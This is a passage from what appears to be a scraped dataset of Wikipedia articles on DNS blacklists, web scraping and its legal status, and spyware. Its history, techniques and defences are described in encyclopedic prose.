1997, at first as a Border Gateway Protocol (BGP) feed by Paul Vixie, and then as a DNSBL by Eric Ziegast as part of Vixie's Mail Abuse Prevention System (MAPS); Dave Rand at Abovenet was its first subscriber. 11 The very first version of the RBL was not published as a DNSBL, but rather a list of networks transmitted via BGP to routers owned by subscribers so that network operators could drop all TCP IP traffic for machines used to send spam or host spam supporting services, such as a website. The inventor of the technique later commonly called a DNSBL was Eric Ziegast while employed at Vixie Enterprises. The term "blackhole" refers to a networking black hole, an expression for a link on a network that drops incoming traffic instead of forwarding it normally. The intent of the RBL was that sites using it would refuse traffic from sites which supported spam — whether by actively sending spam, or in other ways. Before an address would be listed on the RBL, volunteers and MAPS staff would attempt repeatedly to contact the persons responsible for it and get its problems corrected. Such effort was considered very important before black-holing all network traffic, but it also meant that spammers and spam supporting ISPs could delay being put on the RBL for long periods while such discussions went on. Later, the RBL was also released in a DNSBL form and Paul Vixie encouraged the authors of sendmail and other mail software to implement RBL support in their clients. These allowed the mail software to query the RBL and reject mail from listed sites on a per-mail-server basis instead of black-holing all traffic. Soon after the advent of the RBL, others started developing their own lists with different policies. One of the first was Alan Brown's Open Relay Behavior-modification System (ORBS). This used automated testing to discover and list mail servers running as open mail relays—exploitable by spammers to carry their spam. ORBS was controversial at the time because many people felt running an open relay was acceptable, and that scanning the Internet for open mail servers could be abusive. In 2003, a number of DNSBLs came under denial-of-service attacks (DOS). Since no party has admitted to these attacks nor been discovered responsible, their purpose is a matter of speculation. However, many observers believe the attacks are perpetrated by spammers in order to interfere with the DNSBLs' operation or hound them into shutting down. In August 2003, the firm Osirusoft, an operator of several DNSBLs including one based on the SPEWS data set, shut down its lists after suffering weeks of near-continuous attack. Technical specifications for DNSBLs came relatively late in RFC5782. 12 A Uniform Resource Identifier (URI) DNSBL is a DNSBL that lists the domain names and sometimes also IP addresses which are found in the "clickable" links contained in the body of spams, but generally not found inside legitimate messages. URI DNSBLs were created when it was determined that much spam made it past spam filters during that short time frame between the first use of a spam-sending IP address and the point where that sending IP address was first listed on major sending-IP-based DNSBLs. In many cases, such elusive spam contains in their links domain names or IP addresses (collectively referred to as a URIs) where that URI was already spotted in previously caught spam and where that URI is not found in non-spam e-mail. Therefore, when a spam filter extracts all URIs from a message and checks them against a URI DNSBL, then the spam can be blocked even if the sending IP for that spam has not yet been listed on any sending IP DNSBL. Of the three major URI DNSBLs, the oldest and most popular is SURBL. 13 After SURBL was created, some of the volunteers for SURBL started the second major URI DNSBL, URIBL. 14 In 2008, another long-time SURBL volunteer started another URI DNSBL, ivmURI. 15 The Spamhaus Project provides the Spamhaus Domain Block List (DBL) which they describe as domains "found in spam messages". 16 The DBL is intended as both a URIBL and RHSBL, to be checked against both domains in a message's envelope and headers and domains in URLs in message bodies. Unlike other URIBLs, the DBL only lists domain names, not IP addresses, since Spamhaus provides other lists of IP addresses. URI DNSBLs are often confused with RHSBLs (Right Hand Side BLs). But they are different. A URI DNSBL lists domain names and IPs found in the body of the message. An RHSBL lists the domain names used in the "from" or "reply-to" e-mail address. RHSBLs are of debatable effectiveness since many spams either use forged "from" addresses or use "from" addresses containing popular freemail domain names, such as gmail.com, yahoo.com, or hotmail.com URI DNSBLs are more widely used than RHSBLs, are very effective, and are used by the majority of spam filters. To operate a DNSBL requires three things: a domain to host it under, a nameserver for that domain, and a list of addresses to publish. It is possible to serve a DNSBL using any general-purpose DNS server software. However this is typically inefficient for zones containing large numbers of addresses, particularly DNSBLs which list entire Classless Inter-Domain Routing netblocks. For the large resource consumption when using software designed as the role of a Domain Name Server, there are role-specific software applications designed specifically for servers with a role of a DNS blacklist. The hard part of operating a DNSBL is populating it with addresses. DNSBLs intended for public use usually have specific, published policies as to what a listing means, and must be operated accordingly to attain or sustain public confidence. When a mail server receives a connection from a client, and wishes to check that client against a DNSBL (let's say, dnsbl.example.net), it does more or less the following: Looking up an address in a DNSBL is thus similar to looking it up in reverse-DNS. The differences are that a DNSBL lookup uses the "A" rather than "PTR" record type, and uses a forward domain (such as dnsbl.example.net above) rather than the special reverse domain in-addr.arpa. There is an informal protocol for the addresses returned by DNSBL queries which match. Most DNSBLs return an address in the 127.0.0.0 8 IP loopback network. The address 127.0.0.2 indicates a generic listing. Other addresses in this block may indicate something specific about the listing—that it indicates an open relay, proxy, spammer-owned host, etc. For details see RFC 5782. A URI DNSBL query (and an RHSBL query) is fairly straightforward. The domain name to query is prepended to the DNS list host as follows: where dnslist.example.com is the DNS list host and example.net is the queried domain. Generally if an A record is returned the name is listed. Different DNSBLs have different policies. DNSBL policies differ from one another on three fronts: In addition to the different types of listed entities (IP addresses for traditional DNSBLs, host and domain names for RHSBLs, URIs for URIBLs) there is a wide range of semantic variations between lists as to what a listing means. List maintainers themselves have been divided on the issues of whether their listings should be seen as statements of objective fact or subjective opinion and on how their lists should best be used. As a result, there is no definitive taxonomy for DNSBLs. Some names defined here (e.g. "Yellow" and "NoBL" 17 ) are varieties that are not in widespread use and so the names themselves are not in widespread use, but should be recognized by many spam control specialists. Some end-users and organizations have concerns regarding the concept of DNSBLs or the specifics of how they are created and used. Some of the criticisms include: Despite the criticisms, few people object to the principle that mail-receiving sites should be able to reject undesired mail systematically. One person who does is John Gilmore, who deliberately operates an open mail relay. Gilmore accuses DNSBL operators of violating antitrust law. For Joe Blow to refuse emails is legal (though it's bad policy, akin to "shooting the messenger"). But if Joe and ten million friends all gang up to make a blacklist, they are exercising illegal monopoly power. 24 A number of parties, such as the Electronic Frontier Foundation and Peacefire, have raised concerns about some use of DNSBLs by ISPs. One joint statement issued by a group including EFF and Peacefire addressed "stealth blocking", in which ISPs use DNSBLs or other spam-blocking techniques without informing their clients. 25 Spammers have pursued lawsuits against DNSBL operators on similar grounds: |
138 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Web_scraping | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
139 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Spyware | Spyware (a portmanteau for spying software) is any software with malicious behavior that aims to gather information about a person or organization and send it to another entity in a way that harms the user by violating their privacy, endangering their device's security, or other means. This behavior may be present in malware and in legitimate software. Websites may engage in spyware behaviors like web tracking. Hardware devices may also be affected. 1 Spyware is frequently associated with advertising and involves many of the same issues. Because these behaviors are so common, and can have non-harmful uses, providing a precise definition of spyware is a difficult task. 2 The first recorded use of the term spyware occurred on October 16, 1995, in a Usenet post that poked fun at Microsoft's business model. 3 Spyware at first denoted software meant for espionage purposes. However, in early 2000 the founder of Zone Labs, Gregor Freund, used the term in a press release for the ZoneAlarm Personal Firewall. 4 Later in 2000, a parent using ZoneAlarm was alerted to the fact that Reader Rabbit, educational software marketed to children by the Mattel toy company, was surreptitiously sending data back to Mattel. 5 Since then, "spyware" has taken on its present sense. According to a 2005 study by AOL and the National Cyber-Security Alliance, 61 percent of surveyed users' computers were infected with some form of spyware. 92 percent of surveyed users with spyware reported that they did not know of its presence, and 91 percent reported that they had not given permission for the installation of the spyware. 6 As of 2006 update , spyware has become one of the preeminent security threats to computer systems running Microsoft Windows operating systems. Computers on which Internet Explorer (IE) was the primary browser are particularly vulnerable to such attacks, not only because IE was the most widely used, 7 but also because its tight integration with Windows allows spyware access to crucial parts of the operating system. 7 8 Before Internet Explorer 6 SP2 was released as part of Windows XP Service Pack 2, the browser would automatically display an installation window for any ActiveX component that a website wanted to install. The combination of user ignorance about these changes, and the assumption by Internet Explorer that all ActiveX components are benign, helped to spread spyware significantly. Many spyware components would also make use of exploits in JavaScript, Internet Explorer and Windows to install without user knowledge or permission. The Windows Registry contains multiple sections where modification of key values allows software to be executed automatically when the operating system boots. Spyware can exploit this design to circumvent attempts at removal. The spyware typically links itself to each location in the registry that allows execution. Once running, the spyware will periodically check if any of these links are removed. If so, they will be automatically restored. This ensures that the spyware will execute when the operating system is booted, even if some (or most) of the registry links are removed. Spyware is mostly classified into four types: adware, system monitors, tracking including web tracking, and trojans; 9 examples of other notorious types include digital rights management capabilities that "phone home", keyloggers, rootkits, and web beacons. These four categories are not mutually exclusive and they have similar tactics in attacking networks and devices. 10 The main goal is to install, hack into the network, avoid being detected, and safely remove themselves from the network. 10 Spyware is mostly used for the stealing information and storing Internet users' movements on the Web and serving up pop-up ads to Internet users. 11 Whenever spyware is used for malicious purposes, its presence is typically hidden from the user and can be difficult to detect. Some spyware, such as keyloggers, may be installed by the owner of a shared, corporate, or public computer intentionally in order to monitor users. While the term spyware suggests software that monitors a user's computer, the functions of spyware can extend beyond simple monitoring. Spyware can collect almost any type of data, including personal information like internet surfing habits, user logins, and bank or credit account information. Spyware can also interfere with a user's control of a computer by installing additional software or redirecting web browsers. 12 Some spyware can change computer settings, which can result in slow Internet connection speeds, un-authorized changes in browser settings, or changes to software settings. Sometimes, spyware is included along with genuine software, and may come from a malicious website or may have been added to the intentional functionality of genuine software (see the paragraph about Facebook, below). In response to the emergence of spyware, a small industry has sprung up dealing in anti-spyware software. Running anti-spyware software has become a widely recognized element of computer security practices, especially for computers running Microsoft Windows. A number of jurisdictions have passed anti-spyware laws, which usually target any software that is surreptitiously installed to control a user's computer. In German-speaking countries, spyware used or made by the government is called govware by computer experts (in common parlance: Regierungstrojaner, literally "Government Trojan"). Govware is typically a trojan horse software used to intercept communications from the target computer. Some countries, like Switzerland and Germany, have a legal framework governing the use of such software. 13 14 In the US, the term "policeware" has been used for similar purposes. 15 Use of the term "spyware" has eventually declined as the practice of tracking users has been pushed ever further into the mainstream by major websites and data mining companies; these generally break no known laws and compel users to be tracked, not by fraudulent practices per se, but by the default settings created for users and the language of terms-of-service agreements. In one documented example, on CBS CNet News reported, on March 7, 2011, an analysis in The Wall Street Journal revealed the practice of Facebook and other websites of tracking users' browsing activity, which is linked to their identity, far beyond users' visits and activity on the Facebook site itself. The report stated: "Here's how it works. You go to Facebook, you log in, you spend some time there, and then ... you move on without logging out. Let's say the next site you go to is The New York Times. Those buttons, without you clicking on them, have just reported back to Facebook and Twitter that you went there and also your identity within those accounts. Let's say you moved on to something like a site about depression. This one also has a tweet button, a Google widget, and those, too, can report back who you are and that you went there. The Wall Street Journal analysis was researched by Brian Kennish, founder of Disconnect, Inc. 16 Spyware does not necessarily spread in the same way as a virus or worm because infected systems generally do not attempt to transmit or copy the software to other computers. Instead, spyware installs itself on a system by deceiving the user or by exploiting software vulnerabilities. Most spyware is installed without knowledge, or by using deceptive tactics. Spyware may try to deceive users by bundling itself with desirable software. Other common tactics are using a Trojan horse, spy gadgets that look like normal devices but turn out to be something else, such as a USB Keylogger. These devices actually are connected to the device as memory units but are capable of recording each stroke made on the keyboard. Some spyware authors infect a system through security holes in the Web browser or in other software. When the user navigates to a Web page controlled by the spyware author, the page contains code which attacks the browser and forces the download and installation of spyware. The installation of spyware frequently involves Internet Explorer. Its popularity and history of security issues have made it a frequent target. Its deep integration with the Windows environment make it susceptible to attack into the Windows operating system. Internet Explorer also serves as a point of attachment for spyware in the form of Browser Helper Objects, which modify the browser's behaviour. A spyware rarely operates alone on a computer; an affected machine usually has multiple infections. Users frequently notice unwanted behavior and degradation of system performance. A spyware infestation can create significant unwanted CPU activity, disk usage, and network traffic. Stability issues, such as applications freezing, failure to boot, and system-wide crashes are also common. Usually, this effect is intentional, but may be caused from the malware simply requiring large amounts of computing power, disk space, or network usage. Spyware, which interferes with networking software commonly causes difficulty connecting to the Internet. In some infections, the spyware is not even evident. Users assume in those situations that the performance issues relate to faulty hardware, Windows installation problems, or another malware infection. Some owners of badly infected systems resort to contacting technical support experts, or even buying a new computer because the existing system "has become too slow". Badly infected systems may require a clean reinstallation of all their software in order to return to full functionality. Moreover, some types of spyware disable software firewalls and antivirus software, and or reduce browser security settings, which opens the system to further opportunistic infections. Some spyware disables or even removes competing spyware programs, on the grounds that more spyware-related annoyances increase the likelihood that users will take action to remove the programs. 17 Keyloggers are sometimes part of malware packages downloaded onto computers without the owners' knowledge. Some keylogger software is freely available on the internet, while others are commercial or private applications. Most keyloggers allow not only keyboard keystrokes to be captured, they also are often capable of collecting screen captures from the computer. A typical Windows user has administrative privileges, mostly for convenience. Because of this, any program the user runs has unrestricted access to the system. As with other operating systems, Windows users are able to follow the principle of least privilege and use non-administrator accounts. Alternatively, they can reduce the privileges of specific vulnerable Internet-facing processes, such as Internet Explorer. Since Windows Vista is, by default, a computer administrator that runs everything under limited user privileges, when a program requires administrative privileges, a User Account Control pop-up will prompt the user to allow or deny the action. This improves on the design used by previous versions of Windows. Spyware is also known as tracking software. As the spyware threat has evolved, a number of techniques have emerged to counteract it. These include programs designed to remove or block spyware, as well as various user practices which reduce the chance of getting spyware on a system. Nonetheless, spyware remains a costly problem. When a large number of pieces of spyware have infected a Windows computer, the only remedy may involve backing up user data, and fully reinstalling the operating system. For instance, some spyware cannot be completely removed by Symantec, Microsoft, PC Tools. Many programmers and some commercial firms have released products designed to remove or block spyware. Programs such as PC Tools' Spyware Doctor, Lavasoft's Ad-Aware SE and Patrick Kolla's Spybot - Search Destroy rapidly gained popularity as tools to remove, and in some cases intercept, spyware programs. On December, 2004, Microsoft acquired the GIANT AntiSpyware software, 18 re branding it as Microsoft AntiSpyware (Beta 1) and releasing it as a free download for Genuine Windows XP and Windows 2003 users. In November, 2005, it was renamed Windows Defender. 19 20 Major anti-virus firms such as Symantec, PC Tools, McAfee and Sophos have also added anti-spyware features to their existing anti-virus products. Early on, anti-virus firms expressed reluctance to add anti-spyware functions, citing lawsuits brought by spyware authors against the authors of web sites and programs which described their products as "spyware". However, recent versions of these major firms home and business anti-virus products do include anti-spyware functions, albeit treated differently from viruses. Symantec Anti-Virus, for instance, categorizes spyware programs as "extended threats" and now offers real-time protection against these threats. Other Anti-spyware tools include FlexiSPY, Mobilespy, mSPY, TheWiSPY, and UMobix. 21 Anti-spyware programs can combat spyware in two ways: Such programs inspect the contents of the Windows registry, operating system files, and installed programs, and remove files and entries which match a list of known spyware. Real-time protection from spyware works identically to real-time anti-virus protection: the software scans disk files at download time, and blocks the activity of components known to represent spyware. In some cases, it may also intercept attempts to install start-up items or to modify browser settings. Earlier versions of anti-spyware programs focused chiefly on detection and removal. Javacool Software's SpywareBlaster, one of the first to offer real-time protection, blocked the installation of ActiveX-based spyware. Like most anti-virus software, many anti-spyware adware tools require a frequently updated database of threats. As new spyware programs are released, anti-spyware developers discover and evaluate them, adding to the list of known spyware, which allows the software to detect and remove new spyware. As a result, anti-spyware software is of limited usefulness without regular updates. Updates may be installed automatically or manually. A popular generic spyware removal tool used by those that requires a certain degree of expertise is HijackThis, which scans certain areas of the Windows OS where spyware often resides and presents a list with items to delete manually. As most of the items are legitimate windows files registry entries it is advised for those who are less knowledgeable on this subject to post a HijackThis log on the numerous antispyware sites and let the experts decide what to delete. If a spyware program is not blocked and manages to get itself installed, it may resist attempts to terminate or uninstall it. Some programs work in pairs: when an anti-spyware scanner (or the user) terminates one running process, the other one respawns the killed program. Likewise, some spyware will detect attempts to remove registry keys and immediately add them again. Usually, booting the infected computer in safe mode allows an anti-spyware program a better chance of removing persistent spyware. Killing the process tree may also work. To detect spyware, computer users have found several practices useful in addition to installing anti-spyware programs. Many users have installed a web browser other than Internet Explorer, such as Mozilla Firefox or Google Chrome. Though no browser is completely safe, Internet Explorer was once at a greater risk for spyware infection due to its large user base as well as vulnerabilities such as ActiveX but these three major browsers are now close to equivalent when it comes to security. 22 23 Some ISPs—particularly colleges and universities—have taken a different approach to blocking spyware: they use their network firewalls and web proxies to block access to Web sites known to install spyware. On March 31, 2005, Cornell University's Information Technology department released a report detailing the behavior of one particular piece of proxy-based spyware, Marketscore, and the steps the university took to intercept it. 24 Many other educational institutions have taken similar steps. Individual users can also install firewalls from a variety of companies. These monitor the flow of information going to and from a networked computer and provide protection against spyware and malware. Some users install a large hosts file which prevents the user's computer from connecting to known spyware-related web addresses. Spyware may get installed via certain shareware programs offered for download. Downloading programs only from reputable sources can provide some protection from this source of attack. 25 Individual users can use cellphone computer with physical (electric) switch, or isolated electronic switch that disconnects microphone, camera without bypass and keep it in disconnected position where not in use, that limits information that spyware can collect. (Policy recommended by NIST Guidelines for Managing the Security of Mobile Devices, 2013). A few spyware vendors, notably 180 Solutions, have written what the New York Times has dubbed "stealware", and what spyware researcher Ben Edelman terms affiliate fraud, a form of click fraud. Stealware diverts the payment of affiliate marketing revenues from the legitimate affiliate to the spyware vendor. Spyware which attacks affiliate networks places the spyware operator's affiliate tag on the user's activity replacing any other tag, if there is one. The spyware operator is the only party that gains from this. The user has their choices thwarted, a legitimate affiliate loses revenue, networks' reputations are injured, and vendors are harmed by having to pay out affiliate revenues to an "affiliate" who is not party to a contract. 26 Affiliate fraud is a violation of the terms of service of most affiliate marketing networks. Mobile devices can also be vulnerable to chargeware, which manipulates users into illegitimate mobile charges. In one case, spyware has been closely associated with identity theft. 27 In August 2005, researchers from security software firm Sunbelt Software suspected the creators of the common CoolWebSearch spyware had used it to transmit "chat sessions, user names, passwords, bank information, etc. ; 28 however it turned out that "it actually (was) its own sophisticated criminal little trojan that's independent of CWS. 29 This case is currently under investigation by the FBI. The Federal Trade Commission estimates that 27.3 million Americans have been victims of identity theft, and that financial losses from identity theft totaled nearly $48 billion for businesses and financial institutions and at least $5 billion in out-of-pocket expenses for individuals. 30 Some copy-protection technologies have borrowed from spyware. In 2005, Sony BMG Music Entertainment was found to be using rootkits in its XCP digital rights management technology 31 Like spyware, not only was it difficult to detect and uninstall, it was so poorly written that most efforts to remove it could have rendered computers unable to function. Texas Attorney General Greg Abbott filed suit, 32 and three separate class-action suits were filed. 33 Sony BMG later provided a workaround on its website to help users remove it. 34 Beginning on April 25, 2006, Microsoft's Windows Genuine Advantage Notifications application 35 was installed on most Windows PCs as a "critical security update". While the main purpose of this deliberately uninstallable application is to ensure the copy of Windows on the machine was lawfully purchased and installed, it also installs software that has been accused of "phoning home" on a daily basis, like spyware. 36 37 It can be removed with the RemoveWGA tool. Stalkerware is spyware that has been used to monitor electronic activities of partners in intimate relationships. At least one software package, Loverspy, was specifically marketed for this purpose. Depending on local laws regarding communal marital property, observing a partner's online activity without their consent may be illegal; the author of Loverspy and several users of the product were indicted in California in 2005 on charges of wiretapping and various computer crimes. 38 Anti-spyware programs often report Web advertisers' HTTP cookies, the small text files that track browsing activity, as spyware. While they are not always inherently malicious, many users object to third parties using space on their personal computers for their business purposes, and many anti-spyware programs offer to remove them. 39 Shameware or "accountability software" is a type of spyware that is not hidden from the user, but operates with their knowledge, if not necessarily their consent. Parents, religious leaders or other authority figures may require their children or congregation members to install such software, which is intended to detect the viewing of pornography or other content deemed inappropriate, and to report it to the authority figure, who may then confront the user about it. 40 These common spyware programs illustrate the diversity of behaviors found in these attacks. Note that as with computer viruses, researchers give names to 